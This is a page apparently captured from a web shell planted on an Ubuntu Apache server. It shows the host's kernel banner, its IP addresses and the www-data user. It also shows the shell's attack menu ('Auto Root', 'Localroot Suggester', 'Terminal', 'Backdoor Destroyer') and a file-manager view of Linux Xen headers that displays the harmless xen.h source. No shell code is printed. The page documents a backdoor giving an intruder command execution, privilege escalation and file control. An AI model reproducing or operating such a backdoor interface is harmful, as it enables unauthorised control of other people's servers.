Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-4.4.0-210 /
include /
xen /
Delete
Unzip
Name
Size
Permission
Date
Action
interface
[ DIR ]
drwxr-xr-x
2021-04-21 07:33
acpi.h
3.41
KB
-rw-r--r--
2016-01-11 00:01
balloon.h
1
KB
-rw-r--r--
2016-01-11 00:01
events.h
5.01
KB
-rw-r--r--
2021-04-16 11:57
features.h
463
B
-rw-r--r--
2016-01-11 00:01
grant_table.h
8.98
KB
-rw-r--r--
2021-04-16 11:57
hvc-console.h
479
B
-rw-r--r--
2016-01-11 00:01
hvm.h
1.25
KB
-rw-r--r--
2016-01-11 00:01
page.h
1.29
KB
-rw-r--r--
2021-04-16 11:57
platform_pci.h
2.01
KB
-rw-r--r--
2016-01-11 00:01
swiotlb-xen.h
2.1
KB
-rw-r--r--
2021-04-16 11:57
tmem.h
310
B
-rw-r--r--
2016-01-11 00:01
xen-ops.h
3.37
KB
-rw-r--r--
2016-01-11 00:01
xen.h
1.37
KB
-rw-r--r--
2016-01-11 00:01
xenbus.h
8.55
KB
-rw-r--r--
2021-04-16 11:57
xenbus_dev.h
1.8
KB
-rw-r--r--
2016-01-11 00:01
Save
Rename
#ifndef _XEN_XEN_H #define _XEN_XEN_H enum xen_domain_type { XEN_NATIVE, /* running on bare hardware */ XEN_PV_DOMAIN, /* running in a PV domain */ XEN_HVM_DOMAIN, /* running in a Xen hvm domain */ }; #ifdef CONFIG_XEN extern enum xen_domain_type xen_domain_type; #else #define xen_domain_type XEN_NATIVE #endif #define xen_domain() (xen_domain_type != XEN_NATIVE) #define xen_pv_domain() (xen_domain() && \ xen_domain_type == XEN_PV_DOMAIN) #define xen_hvm_domain() (xen_domain() && \ xen_domain_type == XEN_HVM_DOMAIN) #ifdef CONFIG_XEN_DOM0 #include <xen/interface/xen.h> #include <asm/xen/hypervisor.h> #define xen_initial_domain() (xen_domain() && \ xen_start_info && xen_start_info->flags & SIF_INITDOMAIN) #else /* !CONFIG_XEN_DOM0 */ #define xen_initial_domain() (0) #endif /* CONFIG_XEN_DOM0 */ #ifdef CONFIG_XEN_PVH /* This functionality exists only for x86. The XEN_PVHVM support exists * only in x86 world - hence on ARM it will be always disabled. * N.B. ARM guests are neither PV nor HVM nor PVHVM. * It's a bit like PVH but is different also (it's further towards the H * end of the spectrum than even PVH). */ #include <xen/features.h> #define xen_pvh_domain() (xen_pv_domain() && \ xen_feature(XENFEAT_auto_translated_physmap) && \ xen_have_vector_callback) #else #define xen_pvh_domain() (0) #endif #endif /* _XEN_XEN_H */